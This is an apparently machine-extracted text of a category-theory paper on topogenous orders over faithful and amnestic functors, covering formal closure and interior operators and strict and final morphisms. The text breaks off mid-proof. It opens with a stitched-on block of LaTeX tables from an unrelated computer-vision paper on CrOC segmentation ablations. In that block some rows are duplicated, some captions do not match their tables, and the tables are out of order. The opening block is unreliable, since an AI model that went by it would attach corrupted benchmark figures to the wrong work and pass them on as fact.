**56.5** & 11.9 & 49.8 \\ keys & 15.7 & **56.5** & 12.1 & **56.5** & 17.9 & **50.2** \\ matches & **16.5** & 55.2 & **16.0** & 55.8 & **21.5** & 49.5 \\ \hline \hline \end{tabular} \end{table} Table 6: **Ablation: type of tokens used for the clustering.** We evaluate the impact of using either of the keys, values, or queries tokens of the last transformer block. We report the mIoU scores for both the linear and unsupervised segmentation downstream tasks. \begin{table} \begin{tabular}{l c c c c c} \hline \hline Method & Model / Dataset & PVOC12 & CC-Th. & CC-St. & Avg. 
\\ \hline \hline \(Global\)_features_ & & & & & \\ BYOL [15] & ResNet50 / CC+ & 13.6 & 9.4 & 8.9 & 10.6 \\ DINO [6] & ViT-S/16 / CC & 5.2 & 9.4 & 14.0 & 9.5 \\ \hline \hline \multicolumn{5}{l}{_Local features_} & & & \\ DRL [47] & ResNet50 / CC+ & 11.9 & 12.0 & 13.7 & 12.5 \\ DenseCL [41] & ResNet50 / IN & 18.0 & **19.2** & 16.9 & 18.0 \\ SeCo [43] & ResNet50 / IN & 15.1 & 16.3 & 18.9 & 16.8 \\ ReSim [45] & ResNet50 / IN & 17.1 & 15.9 & 16.6 & 16.5 \\ FixPro [48] & ResNet50 / IN & 9.5 & 15.2 & 12.4 & 12.4 \\ VICRepL [2] & ResNet50 / IN & 13.9 & 11.2 & 16.0 & 13.7 \\ MAE [18] & ViT-S/16 / CC & 3.3 & 7.5 & 13.6 & 8.1 \\ CP2 [39] & ViT-S/16 / IN & 9.5 & 12.9 & 13.6 & 12.0 \\ \hline \multicolumn{5}{l}{_Ours_} & & & \\ \hline **CrOC** & ViT-S/16 / CC+ & 16.1 & 17.2 & 20.0 & 17.8 \\ **CrOC** & ViT-S/16 / CC+ & **20.6** & 17.1 & **21.9** & **19.9** \\ **CrOC** & ViT-S/16 / IN & 3.8 & 5.4 & 6.6 & 5.3 \\ \hline \hline \end{tabular} \end{table} Table 3: **Transfer results of unsupervised segmentation task.** The frozen spatial features of each image in a given dataset are clustered into as many clusters as there are classes in the dataset. The Hungarian matching algorithm is used to label the clusters. The mIoU scores are reported on PVOC12 [13], COCO-Things (CC-Th.) and COCO-Stuff (CC-St.) [29]. The pre-training dataset is either of ImageNet (IN) [11], COCO (CC), or COCO+ (CC+). \begin{table} \begin{tabular}{l c c c c c c} \hline \hline & \multicolumn{2}{c}{PVOC12} & \multicolumn{2}{c}{COCO-Things} & \multicolumn{2}{c}{COCO-Suff} \\ \cline{2-7} Tokens & Unsupervised & Linear & Unsupervised & Linear & Unsupervised & Linear \\ \hline last & 11.2 & 52.6 & 12.7 & 54.6 & 16.0 & 49.1 \\ queries & 8.3 & 55.1 & 7.6 & **56.5** & 11.9 & 49.8 \\ keys & 15.7 & **56.5** & 12.1 & **56.5** & 17.9 & **50.2** \\ matches & **16.5** & 55.2 & **16.0** & 55.8 & **21.5** & 49.5 \\ \hline \hline \end{tabular} \end{table} Table 4: **Ablation: positional cues weight \(\lambda_{\text{pos}}\).** We report the mIoU scores for linear and unsupervised segmentation tasks. \begin{table} \begin{tabular}{l c c c c c} \hline \hline & \multicolumn{2}{c}{PVOC12} & \multicolumn{2}{c}{COCO-Things} & \multicolumn{2}{c}{COCO-Suff} \\ \cline{2-7} \(K_{\text{start}}\) & Unsupervised & Linear & Unsupervised & Linear & Unsupervised & Linear \\ \hline 4 & 5.3 & 48.0 & 8.3 & 48.7 & 12.6 & 47.5 \\ 8 & **15.8** & 54.8 & **17.6** & 56.5 & **23.4** & 49.8 \\ 12 & 15.7 & **56.5** & **12.1** & **56.5** & 17.9 & **50.2** \\ 16 & 10.9 & **56.9** & 8.0 & **58.0** & 14.2 & **59.5** \\ \hline \hline \end{tabular} \end{table} Table 5: **Ablation: initial number of centroids \(K_{\text{start}}\).** We report the mIoU scores for both the linear and unsupervised segmentation downstream tasks.
2301.12722
Topogenous structures on faithful and amnestic functors
Departing from a suitable categorical concept of topogenous orders defined relative to the bifibration of subobjects, this note introduces and studies topogenous orders on faithful and amnestic functors. Amongst other things, it is shown that this approach captures the formal closure operators and leads to the introduction of formal interior operators. Turning to special morphisms relative to the orders introduced, we show that a morphism is strict relative to an order if the order preserves codomains of its cocartesian liftings while a morphism is final if the order reflects domains of its cartesian liftings. Key examples in topology and algebra that demonstrate our results are included.
Minani Iragi, David Holgate, Josef Slapal
2023-01-30T08:43:29Z
http://arxiv.org/abs/2301.12722v1
# Topogenous structures on faithful and amnestic functors ###### Abstract Departing from a suitable categorical concept of topogenous orders defined relative to the bifibration of subobjects, this note introduces and studies topogenous orders on faithful and amnestic functors. Amongst other things, it is shown that this approach captures the formal closure operators and leads to the introduction of formal interior operators. Turning to special morphisms relative to the orders introduced, we show that a morphism is strict relative to an order if the order preserves codomains of its cocartesian liftings while a morphism is final if the order reflects domains of its cartesian liftings. Key examples in topology and algebra that demonstrate our results are included. + Footnote †: E-mail addresses: \({}^{a}\)[email protected], \({}^{b}\)[email protected], \({}^{c}\)[email protected]. \({}^{*}\)Corresponding author. The first author acknowledges the support from the Brno University of Technology (BUT) under the project MeMoV II no. CZ.02.2.69/0.0/0.0/18-053/0016962. The second author acknowledges the National Research Foundation of South Africa. The third author acknowledges the support by BUT from the Specific Research Project no. FSI-S-20-6187. ## 1 Introduction A topogenous order \(\sqsubset\) on a category \(\mathcal{C}\) equipped with a proper \((\mathcal{E},\)\(\mathcal{M})\)-factorization structure for morphisms is a family of binary relations, each on the subobject lattice, \(\mathrm{sub}X\), for an object \(X\) in \(\mathcal{C}\) (subject to some axioms) ([9]). This notion, which is crucial for the syntopogenous structures introduced by Csaszar ([3]) with the aim of proposing a unified approach to topological, uniform and proximity spaces, has played a salient role in providing a single setting for the study of categorical closure ([5]), interior ([10]) and neighbourhood ([17]) operators and led to the introduction of quasi-uniform structures in categories (see e.g. [7, 8, 12, 14, 13]). Topogenous orders are easier to work with when it comes to the study of topological structures on categories. A new way of introducing topological structures on categories was proposed by Dikranjan and Giuli, who originally defined the categorical closure operators. A closure operator on a finitely \(\mathcal{M}\)-complete category \(\mathcal{C}\) is a pointed endofunctor of \(\mathcal{M}\), where the class \(\mathcal{M}\) is seen as the full subcategory of the arrow category \(\mathcal{C}^{2}\) whose objects are the morphisms from \(\mathcal{M}\), which "commutes" with the codomain functor \(cod:\mathcal{M}\longrightarrow\mathcal{C}\). The functor \(cod\) is a bifibration and indeed, categorical closure operators are defined relative to the bifibration of \(\mathcal{M}\)-subobjects. Replacing \(\mathcal{M}\) by an arbitrary category and the codomain functor by a faithful and amnestic functor \(F\), called \(form\) in [15], the notion of formal closure operator was recently obtained in [6]. The formal closure operators behave well and keep most of the properties of the categorical closure operators. In particular, these closure operators capture epireflective subcategories through the notions of idempotency, coherently, and minimality. Viewing a categorical topogenous order as defined relative to the bifibration of subobjects, we replace the functor \(cod:\mathcal{M}\longrightarrow\mathcal{C}\) by a suitable form over \(\mathcal{C}\), described at the beginning of the third section of this note.
In this case, the subobject lattice of an object \(X\in\mathcal{C}\) is thought of as the \(fibre\) over \(X\) so that for any \(f:X\longrightarrow Y\) in \(\mathcal{C}\), we think of the image of a subobject as the codomain of a cocartesian lifting of \(f\) at the subobject. Dually, we think of the pre-image of a subobject of \(Y\) as the domain of a cartesian lifting of \(f\) at the subobject. This permits us to introduce and study a notion of topogenous orders on an appropriate faithful and amnestic functor which leads to the formal interior operators and includes the formal closure operators recently introduced as a particular case. While our motivation for studying topogenous structures on forms comes from topological functors, particularly the forgetful functor \(F:\mathbf{Top}\longrightarrow\mathbf{Set}\), our approach permits us to obtain topogenous orders which act on quotients, subobjects, as well as fibres of topological functors - see section 5 for some examples. In section 2, we recall a number of categorical concepts and results needed for the study of topogenous structures on a form. Section 3 studies the topogenous structures on forms. We show that formal closure operators form a reflective subcategory in the category of formal topogenous structures. Interior operators on forms are then introduced and, for forms in which every fibre is a complete lattice, these operators are shown to be in a one-to-one correspondence with a special class of formal topogenous orders. In section 4, we study strict and final morphisms relative to the topogenous order introduced. Among other things, it is proved that a morphism is strict relative to a formal topogenous order if the order preserves the codomains of cocartesian liftings of the morphism. A final morphism relative to this order is one for which the order reflects domains of its cartesian liftings. The note ends with section 5, which presents a number of examples that demonstrate our results. ## 2 Preliminaries We consider a functor \(F:{\cal A}\longrightarrow{\cal C}\). For an object \(X\) in \({\cal C}\), a _fibre_ over \(X\) is the subcategory \(F^{-1}X\) of \({\cal A}\) consisting of those objects \(A\) for which \(FA=X\) and those morphisms \(g\) satisfying \(Fg=1_{X}\) (see e.g. [1]). The functor \(F\) is _faithful_ when for any \(f,g:A\longrightarrow B\) in \({\cal A}\), \(Ff=Fg\Rightarrow f=g\). \(F\) is _amnestic_ if for any isomorphism \(f:A\longrightarrow B\) in \({\cal A}\), \(Ff=1_{FA}\Rightarrow A=B\) and \(f=1_{A}\). For any \({\cal C}\)-morphism \(f:X\longrightarrow Y\), we define the relation \(\leq_{f}:F^{-1}X\longrightarrow F^{-1}Y\) by: \(A\leq_{f}B\) if and only if there is an \({\cal A}\)-morphism \(A\longrightarrow B\) such that \(F(A\longrightarrow B)=f\). In case \(f=1_{X}\), we write \(A\leq_{X}B\) (sometimes we omit the subscript and write \(A\leq B\)). If \(A\leq B\) and \(B\leq A\), then \(A\) and \(B\) are said to be _fibre-isomorphic_. Of course, if \(F\) is amnestic and \(A\) and \(B\) are fibre-isomorphic, then they are isomorphic (expressed as \(A\cong B\)). For any object \(X\in{\cal C}\), \(\leq_{X}\) is reflexive and transitive. If the functor \(F\) is faithful, then \(\leq_{X}\) is anti-symmetric if and only if \(F\) is amnestic. Let \(F:{\cal A}\longrightarrow{\cal C}\) be a faithful functor. According to [4], an \({\cal A}\)-morphism \(\alpha:A\longrightarrow B\) is an \(F\)-_lifting_ (or simply a lifting) of a \({\cal C}\)-morphism \(f:FA\longrightarrow FB\) if \(F\alpha=f\). 
We may sometimes say that a \({\cal C}\)-morphism \(f:FA\longrightarrow FB\) is an \({\cal A}\)-morphism if it has a lifting \(\alpha:A\longrightarrow B\). A _cartesian lifting_ of a \({\cal C}\)-morphism \(f:X\longrightarrow Y\) at \(B\in F^{-1}Y\) is a lifting of \(f\) with condomain \(B\) having the property that for any \(C\in{\cal A}\), a \({\cal C}\)-morphism \(g:FC\longrightarrow FA\) is an \({\cal A}\)-morphism whenever \(f\circ g:FC\longrightarrow FB\) is an \({\cal A}\)-morphism. Clearly, \(\alpha:A\longrightarrow B\) is a cartesian lifting of \(f:X\longrightarrow Y\) at \(B\in F^{-1}Y\) if and only if \(A\leq_{f}B\) and for any \(C\in{\cal A}\) and any \({\cal C}\)-morphism \(g:FC\longrightarrow FA\), \(C\leq_{f\circ g}B\Leftrightarrow C\leq_{g}A\). Dually, a _cocartesian lifting_ of \(f:X\longrightarrow Y\) at \(A\in F^{-1}X\) is a lifting of \(f\) with domain \(A\) having the property that for any \({\cal A}\)-object \(C\), a \({\cal C}\)-morphism \(g:FB\longrightarrow FC\) is an \({\cal A}\)-morphism whenever \(g\circ f:FA\longrightarrow FC\) is an \(\mathcal{A}\)-morphism. Clearly, \(\alpha:A\longrightarrow B\) is a cocartesian lifting of \(f:X\longrightarrow Y\) at \(A\in F^{-1}X\) if and only if \(A\leq_{f}B\) and for any \(C\in\mathcal{A}\) and any \(\mathcal{C}\)-morphism \(g:FB\longrightarrow FC\), \(B\leq_{g}C\Leftrightarrow A\leq_{g\circ f}C\). The codomain of a cocartesian lifting of \(f\) at \(A\), when it exists, shall be denoted by \(f.\ A\). Dually, the domain of a cartesian lifting of \(f\) at \(B\), when it exists, shall be denoted by \(B.\ f\). Thus, if \(\alpha:B.\ f\longrightarrow B\) (\(\alpha:A\longrightarrow f.\ A\)) is a cartesian (co-cartesian) lifting of \(f:X\longrightarrow Y\) at \(B\) (\(A\)), then \(C\leq_{g}B.\ f\Leftrightarrow C\leq_{f\circ g}B\) (\(f.\ A\leq_{g}C\Leftrightarrow A\leq_{g\circ f}C\)) whenever \(C\in\mathcal{A}\) and \(g:FC\longrightarrow X\) (\(g:Y\longrightarrow FC\)) is a \(\mathcal{C}\)-morphism. Following [2], a functor \(F:\mathcal{A}\longrightarrow\mathcal{C}\) is a _fibration_ if for every morphism \(f:X\longrightarrow Y\) and \(B\in F^{-1}Y\), there is a cartesian lift of \(f\) at \(B\). If \(F^{op}:\mathcal{A}^{op}\longrightarrow\mathcal{C}^{op}\), where the upper index "op" stands for "opposite", is a fibration, then \(F\) is said to be an _opfibration_. \(F\) is \(bifibration\) if it is both a fibration and an opfibration. In accordance with [15], by a _form_ over a category \(\mathcal{C}\), we understand a faithfull and amnestic functor \(F:\mathcal{A}\longrightarrow\mathcal{C}\). If \(F\) is the codomain functor \(\mathcal{M}\longrightarrow\mathcal{C}\) where \(\mathcal{M}\) is a class of monomorphisms in \(\mathcal{C}\) seen as the full subcategory of the arrow category \(\mathcal{C}^{2}\), then \(F\) is called the _form of \(\mathcal{M}\)-subobjects_. The dual concept to the one of the form of \(\mathcal{M}\)-subobjects is the _form of \(\mathcal{M}\)-quotients_. According to [16], a form \(F\) over a category \(\mathcal{C}\) is said to be _locally bounded_ if each of its fibres has an upper bound and a lower bound. The upper bound (resp. the lower bound) of \(F^{-1}X\) will be denoted by \(1^{X}\) (resp. \(0^{X}\)). \(F\) is said to be _bounded_ when it is locally bounded and for any morphism \(f:X\longrightarrow Y\) in \(\mathcal{C}\), both \(f.\ 1^{X}\) and \(0^{X}.\ f\) exist. The next Lemma that we recall from [16] is a consequence of properties of (co)cartesian liftings of morphisms. 
**Lemma 2.1**.: _Let \(F\) be a form over \(\mathcal{C}\) and \(f:X\longrightarrow Y\), \(g:Y\longrightarrow Z\ \mathcal{C}\)-morphisms._ 1. _For any_ \(A\in F^{-1}X\)_, if_ \(f.\ A\) _exists, then_ \(g.\ (f.\ A)\) _exists if and only if_ \((g\circ f).\ A\) _exists, in which case_ \(g.\ (f.\ A)=(g\circ f).\ A\)_. Dually, for any_ \(B\in F^{-1}Z\)_, if_ \(B.\ g\) _exists, then_ \((B.\ g).\ f\) _exists if and only if_ \(B.\ (g\circ f)\) _exists, in which case_ \((B.\ g).\ f=B.\ (g\circ f)\)_._ 2. _For any_ \(A_{1},A_{2}\in F^{-1}X\)_, if both_ \(f.\ A_{1}\) _and_ \(f.\ A_{2}\) _exist, then_ \(A_{1}\leq A_{2}\) _implies that_ \(f.\ A_{1}\leq f.\ A_{2}\)_. Dually, for any_ \(B_{1},B_{2}\in F^{-1}Y\)_, if both_ \(B_{1}.\ f\) _and_ \(B_{2}.\ f\) _exist, then_ \(B_{1}\leq B_{2}\) _implies that_ \(B_{1}.\ f\leq B_{2}.\ f\)_._ **Definition 2.1**.: _A closure operator \(C\) on a form \(F:\mathcal{A}\longrightarrow\mathcal{C}\)_ or a _formal closure operator_ is a family of maps \(\{C_{X}:F^{-1}X\longrightarrow\ F^{-1}X\mid X\in\mathcal{C}\}\) such that (C1) \(A\leq C_{X}(A)\) for all \(A\in\ F^{-1}X\) and \(X\in\mathcal{C}\); (C2) for any morphism \(f:X\longrightarrow Y\) in \(\mathcal{C}\), \(A\leq_{f}B\Rightarrow C_{X}(A)\leq_{f}C_{Y}(B)\) for all \(A\in\ F^{-1}X\) and \(B\in\ F^{-1}Y\). We shall denote by \(\mathrm{Clo}(F)\) the conglomerate of all closure operators on \(F\). \(\mathrm{Clo}(F)\) is ordered by \(\preceq\) as follows: for any \(C,C^{\prime}\in\mathrm{Clo}(F)\), \(C\preceq C^{\prime}\) if and only if \(C_{X}(A)\leq C^{\prime}_{X}(A)\) for all \(A\in\ F^{-1}X\) and \(X\in\mathcal{C}\). A closure operator \(C\) on \(F\) is idempotent if \(C\circ C=C\), that is \(C_{X}(C_{X}(A))=C_{X}(A)\) for all \(A\in\ F^{-1}X\) and \(X\in\mathcal{C}\). If \(F\) is a form such that for any \(f:X\longrightarrow Y\) in \(\mathcal{C}\), \(A\in F^{-1}X\) and \(B\in F^{-1}Y\), both \(f.\ A\) and \(B.\ f\) exist, then \((C2)\) in Definition 2.1 is equivalent to \((C3)\ f.\ A\leq_{Y}B\Rightarrow f.\ C_{X}(A)\leq_{Y}C_{Y}(B)\) and to \((C4)\ A\leq_{X}B.\ f\Rightarrow C_{X}(A)\leq_{X}C_{Y}(B).\ f\). We can also obtain \((C2)\) as a conjunction of \((C2^{\prime})\ A\leq_{X}B\Rightarrow C_{X}(A)\leq_{X}C_{X}(B)\) and \((C2^{\prime\prime})\ f.\ C_{X}(A)\leq_{Y}C_{Y}(f.\ A)\) for suitable \(A\), \(B\). ## 3 Topogenous orders on forms For the rest of the paper, we work with a form \(F\) over a category \(\mathcal{C}\) such that for any \(f:X\longrightarrow Y\) in \(\mathcal{C}\), \(A\in F^{-1}X\) and \(B\in F^{-1}Y\), both \(f.\ A\) and \(B.\ f\) exist. We have the following useful Lemma. **Lemma 3.1**.: _Let \(F\) be a form over a category \(\mathcal{C}\), \(f:X\longrightarrow Y\) be a \(\mathcal{C}\)-morphism, and let \(A\in\ F^{-1}X\) and \(B\in\ F^{-1}Y\). Then \(A\leq_{X}(f.\ A).\ f\) and \(f.\ (B.\ f)\leq_{Y}B\). Moreover, if \(F\) reflects sections and \(f\) is a section, then \(A\cong(f.\ A).\ f\). Dually, if \(F\) reflects retractions and \(f\) is a retraction, then \(f.\ (B.\ f)\cong B\). If \(F\) reflects isomorphisms and \(f\) is an isomorphism with inverse \(g\), then for any \(A\in\ F^{-1}X\), \(f.\ A\cong A.\ g.\)_ Proof.: Let \(\beta:(f.\ A).\ f\longrightarrow f.\ A\) be a cartesian lifting of \(f\) at \(f.\ A\). Since \(f=f\circ 1_{X}:FA\longrightarrow F(f.\ A)\), there is a morphism \(h:A\longrightarrow(f.\ A).\ f\) with \(Fh=1_{X}\). Hence \(A\leq_{X}(f.\ A).\ f\). A dual argument shows that \(f.\ (B.\ f)\leq_{Y}B\). 
Let \(\alpha:A\longrightarrow f.\ A\) be a cocartesian lifting of \(f\) at \(A\), \(f\) be a section and let \(F\) reflect sections. Since \(F(\alpha)=F(\beta)=f\), we get that \(F(\beta\circ h)=F(\beta)\circ F(h)=F(\alpha)\circ 1_{X}=F(\alpha)\). Since \(F\) is faithful, we have that \(\alpha=\beta\circ h\) and \(\alpha\) is a section because \(F\) reflects sections. Therefore, \(h\) is a section, i.e. there is a morphism \(k:(f.\ A).\ f\longrightarrow A\) such that \(k\circ h=1_{A}\). Now, \(Fk=Fk\circ 1_{X}=Fk\circ Fh=F(k\circ h)=F1_{A}=1_{X}\). Consequently \((f.\ A).\ f\leq_{X}A\). Thus, \(A\) and \((f.\ A).\ f\) are fibre-isomorphic and hence isomorphic. A dual reasoning proves that \(f.\ (B.\ f)\cong B\). The last part of the proof follows from the fact that \(f\) is an isomorphism if and only if \(f\) is a retraction and a section. It is not difficult to see from Lemma 3.1 that \(f.-:F^{-1}X\longrightarrow F^{-1}Y\), which maps every \(A\in\ F^{-1}X\) to \(f.\ A\), and \(-.\ f:F^{-1}Y\longrightarrow F^{-1}X\), which maps every \(B\in\ F^{-1}Y\) to \(B.\ f\), form a Galois connection, i.e. \(f.\ A\leq_{Y}B\Leftrightarrow A\leq_{X}B.\ f\). Furthermore, the analysis of the proof of Lemma 3.1 shows that the condition that \(F\) reflects sections can be weakened to the condition that co-cartesian liftings of \(f\) preserve sections. Dually, the condition that \(F\) reflects retractions can be weakened to the condition that cartesian liftings of \(f\) preserve retractions. Let \(F\) be the form of \(\mathcal{M}\)-subobjects and \(\mathcal{C}\) a finitely \(\mathcal{M}\)-complete category endowed with a proper \((\mathcal{E},\,\mathcal{M})\)-factorization structure for morphisms. Then for any \(\mathcal{C}\)-morphism \(f:X\longrightarrow Y\), \(F^{-1}X\) is the subobject lattice while \(f.\;m\) (resp. \(n.\;f\)) is simply the image (resp. pre-image) of a subobject, for appropriate \(m\) and \(n\). In addition, if \(\mathcal{C}\) has products of pairs so that sections in \(\mathcal{C}\) belong to \(\mathcal{M}\), then the conditions in Lemma 3.1 are satisfied. **Definition 3.1**.: _A topogenous order_ \(\sqsubset\) on \(F\) is a family \(\{\sqsubset_{X}\;|\;X\in\mathcal{C}\}\) of binary relations, each \(\sqsubset_{X}\) on \(F^{-1}X\), such that:_ 1. \(A\sqsubset_{X}B\Rightarrow A\leq_{X}B\) _for every_ \(A,B\in F^{-1}X\)_._ 2. \(A^{\prime}\leq_{X}A\sqsubset_{X}B\leq_{X}B^{\prime}\Rightarrow A^{\prime} \sqsubset_{X}B^{\prime}\) _for every_ \(A,A^{\prime},B,B^{\prime}\in F^{-1}X\)_._ 3. _For every morphism_ \(f:X\longrightarrow Y\) _in_ \(\mathcal{C}\)_,_ \(f.\;A\sqsubset_{Y}B\Rightarrow A\sqsubset_{X}B.\;f\) _for_ \(A\in F^{-1}X\) _and_ \(B\in F^{-1}Y\)_._ It is quite clear that when \(F\) is the form of \(\mathcal{M}\)-subobjects and \(\mathcal{C}\) is finitely \(\mathcal{M}\)-complete, Definition 3.1 gives the categorical topogenous structures. We shall denote by \(\mathrm{TORD}(F)\) the conglomerate of all topogenous structures on \(F\). One orders \(\mathrm{TORD}(F)\) by \(\subseteq\) as follows: for any \(\sqsubset,\sqsubset^{\prime}\in\)\(\mathrm{TORD}(F)\), \(\sqsubset\subseteq\sqsubset^{\prime}\) if and only if for all \(X\in\mathcal{C}\) and \(A,B\in\;F^{-1}X\), \(A\sqsubset_{X}B\Rightarrow A\sqsubset_{X}^{\prime}B\). A topogenous order \(\sqsubset\) on \(F\) is interpolative if \(A\sqsubset_{X}B\) implies that there is \(C\in F^{-1}X\) such that \(A\sqsubset_{X}C\sqsubset_{X}B\). We denote by \(\mathrm{INTORD}(F)\) the class of all interpolative topogenous structures on \(F\). 
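To fix intuition for Definition 3.1, the following standard illustration may help (it is not spelled out in the note and is added here only as an example). Take \(F\) to be the form of subobjects (subspace embeddings) in \(\mathbf{Top}\), so that \(F^{-1}X\) is the lattice of subspaces of a space \(X\), \(f.\ A=f(A)\) is the image and \(B.\ f=f^{-1}(B)\) the pre-image. Setting
\[A\sqsubset_{X}B\ \Leftrightarrow\ \mathrm{cl}_{X}(A)\subseteq B\]
gives a topogenous order: (T1) and (T2) are immediate, and (T3) holds because continuity of \(f\) gives \(f(\mathrm{cl}_{X}(A))\subseteq\mathrm{cl}_{Y}(f(A))\), so \(\mathrm{cl}_{Y}(f(A))\subseteq B\) implies \(\mathrm{cl}_{X}(A)\subseteq f^{-1}(B)\). This is exactly the order \(\sqsubset^{C}\) associated with the usual topological closure operator by Proposition 3.2 below.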
Consider the following conditions for topogenous orders on \(F\). 1. For \(\mathcal{A}_{I}=\{A_{i}\;|\;i\in I\}\subseteq F^{-1}X\), \((\forall i\in I,\;A_{i}\sqsubset_{X}B)\Rightarrow\bigvee A_{i}\sqsubset_{X}B\) if \(\bigvee A_{i}\) exists. 2. For \(\mathcal{B}_{I}=\{B_{i}\;|\;i\in I\}\subseteq F^{-1}X\), \((\forall i\in I,\;A\sqsubset_{X}B_{i})\Rightarrow A\sqsubset_{X}\bigwedge B_{i}\) if \(\bigwedge B_{i}\) exists. The conglomerate of all topogenous orders on \(F\) satisfying condition \((TM)\) (resp. \((TJ)\)) will be denoted by \(\mathrm{MTORD}(F)\) (resp. \(\mathrm{JTORD}(F)\)). \(\mathrm{MTORD}(F)\) and \(\mathrm{JTORD}(F)\) are closed under arbitrary intersections in \(\mathrm{TORD}(F)\) and are thus reflective subcategories. We next show that, for an appropriate form, the topogenous orders satisfying condition \((TM)\) are in one-to-one correspondence with the closure operators on \(F\). **Proposition 3.2**.: _Let \(F\) be a form such that each of its fibres is a complete lattice. For a topogenous order \(\sqsubset\) on \(F\) satisfying condition \((TM)\) and a closure operator \(C\) on \(F\), the assignments_ \[C\longmapsto\sqsubset^{C}\;\;\text{and}\;\;\sqsubset\longmapsto C^{\sqsubset}\] _where \(A\sqsubset_{X}^{C}B\Leftrightarrow C_{X}(A)\leq_{X}B\) and \(C^{\sqsubset}_{X}(A)=\bigwedge\{B\in\ F^{-1}X\ |\ A\sqsubset_{X}B\}\), for any \(X\in\mathcal{C}\) and \(A,B\in F^{-1}X\), define order isomorphisms inverse to each other between MTORD(\(F\)) and Clo(\(F\)). Moreover, \(C^{\sqsubset}\) is idempotent if and only if \(\sqsubset\) is interpolative._ Proof.: For \(\sqsubset^{C}\), \((T1)\) and \((T2)\) are easily seen to be satisfied, and \((C1)\) is clear for \(C^{\sqsubset}\). Let \(f:X\longrightarrow Y\) be a \(\mathcal{C}\)-morphism and \(\sqsubset\in\) TORD(\(F\)). Then for any \(A\in F^{-1}X\) and \(B\in F^{-1}Y\) such that \(A\leq_{f}B\), \(\{B^{\prime}.\ f\ |\ B\sqsubset B^{\prime}\}\subseteq\{A^{\prime}\ |\ A\sqsubset A^{\prime}\}\) by \((T3)\). This implies that \(C^{\sqsubset}_{X}(A)\leq_{X}C^{\sqsubset}_{Y}(B).\ f\Leftrightarrow C^{\sqsubset}_{X}(A)\leq_{f}C^{\sqsubset}_{Y}(B).\) For \((T3)\), \(f.\ A\sqsubset_{Y}B\Leftrightarrow C^{\sqsubset}_{Y}(f.\ A)\leq_{Y}B\Rightarrow C^{\sqsubset}_{X}(A)\leq_{f}B\Leftrightarrow C^{\sqsubset}_{X}(A)\leq_{X}B.\ f\Leftrightarrow A\sqsubset_{X}B.\ f.\) Clearly, \(C\longmapsto\sqsubset^{C}\) and \(\sqsubset\longmapsto C^{\sqsubset}\) preserve order and are inverse to each other. The fact that \(C^{\sqsubset}\) is idempotent if and only if \(\sqsubset\) is interpolative is clear from the construction of \(C^{\sqsubset}\). Proposition 3.2 together with the well established relationship between categorical closure operators, interior operators and topogenous structures (see [9, 11]) permits us to introduce formal interior operators and to demonstrate that formal topogenous orders satisfying condition \((TJ)\) are indeed in a one-to-one correspondence with formal interior operators provided \(F\) is a form such that each of its fibres is a complete lattice. **Definition 3.2**.: An _interior operator_ \(I\) on a form \(F:\mathcal{A}\longrightarrow\mathcal{C}\), or _formal interior operator_, is a family of maps \(\{I_{X}:F^{-1}X\longrightarrow\ F^{-1}X\ |\ X\in\mathcal{C}\}\) such that * \(I_{X}(A)\leq A\) for all \(A\in\ F^{-1}X\) and \(X\in\mathcal{C}\). * \(A\leq B\Rightarrow I_{X}(A)\leq I_{X}(B)\) for all \(A,B\in\ F^{-1}X\) and \(X\in\mathcal{C}\). 
* For any morphism \(f:X\longrightarrow Y\) in \(\mathcal{C}\), \(I_{Y}(B).\ f\leq I_{X}(B.\ f)\) for \(B\in\ F^{-1}Y\). We shall denote by Int(\(F\)) the conglomerate of all interior operators on \(F\). It is ordered by \(I\leq I^{\prime}\) if \(I_{X}(A)\leq I^{\prime}_{X}(A)\) for all \(A\in\ F^{-1}X\) and \(X\in\mathcal{C}\). An interior operator \(I\) on \(F\) is idempotent if \(I\circ I=I\), that is \(I_{X}(I_{X}(A))=I_{X}(A)\) for all \(A\in\ F^{-1}X\) and \(X\in\mathcal{C}\). A reasoning similar to the one in Proposition 3.2 results in the following proposition. **Proposition 3.3**.: _Let \(F\) be a form such that each of its fibres is a complete lattice. For a topogenous order \(\sqsubset\) on \(F\) satisfying condition \((TJ)\) and an interior operator \(I\) on \(F\), the assignments_ \[I\longmapsto\sqsubset^{I}\ \ \text{and}\ \ \sqsubset\longmapsto I^{\sqsubset}\] _where \(A\sqsubset^{I}_{X}B\Leftrightarrow A\leq_{X}I_{X}(B)\) and \(I^{\sqsubset}_{X}(B)=\bigvee\{A\in F^{-1}X\ |\ A\sqsubset_{X}B\}\) for any \(X\in\mathcal{C}\) and \(A,B\in F^{-1}X\) define order isomorphisms inverse to each other between JTORD(\(F\)) and Int(\(F\)). \(I^{\sqsubset}\) is idempotent if and only if \(\sqsubset\) is interpolative._ ## 4 Strict and final morphisms **Proposition 4.1**.: _Let \(f:X\longrightarrow Y\) be a \(\mathcal{C}\)-morphism and \(\sqsubset\in TORD(F).\) Then \((T3)\) in Definition 3.1 is equivalent to \(A\sqsubset_{Y}B\Rightarrow A.\ f\sqsubset_{X}B.\ f\) for all \(A,B\in F^{-1}Y\)._ Looking at axiom \((T3)\) in Definition 3.1 and Proposition 4.1, one may ask which morphisms satisfy the converse implications. We study in this section \(\mathcal{C}\)-morphisms that preserve topogenous orders \(\sqsubset\) on \(F\) as well as those that reflect them. **Definition 4.1**.: Let \(\sqsubset\) be a topogenous order on \(F\). A morphism \(f:X\longrightarrow Y\) in \(\mathcal{C}\) is said to be \(\sqsubset\)-_strict_ if \(A\sqsubset_{X}B.\ f\Rightarrow f.\ A\sqsubset_{Y}B\) for all \(A\in F^{-1}X\) and \(B\in F^{-1}Y\). Similarly, \(f\) is \(\sqsubset\)-_final_ if \(B.\ f\sqsubset_{X}B^{\prime}.\ f\Rightarrow B\sqsubset_{Y}B^{\prime}\) for all \(B^{\prime},B\in F^{-1}Y\). **Theorem 4.2**.: _Let \(\sqsubset\) be a topogenous order on \(F\). A morphism \(f:X\longrightarrow Y\) is \(\sqsubset\)-strict if and only if \(\sqsubset\) preserves the codomains of cocartesian liftings of \(f\), i.e. \(A\sqsubset_{X}B\Rightarrow f.\ A\sqsubset_{Y}f.\ B\) for \(A,B\in F^{-1}X\)._ Proof.: Assume that \(f\) is \(\sqsubset\)-strict and \(A\sqsubset_{X}B\). Since cartesian and cocartesian liftings of \(f\) exist, \((f.\ B).\ f\) exists and \(A\sqsubset_{X}B\leq(f.\ B).\ f\Rightarrow A\sqsubset_{X}(f.\ B).\ f\Rightarrow f.\ A\sqsubset_{Y}f.\ B.\) Conversely, if \(\sqsubset\) preserves codomains of cocartesian liftings of \(f\) and \(A\sqsubset_{X}B.\ f\), then \(f.\ (B.\ f)\) exists and \(A\sqsubset_{X}B.\ 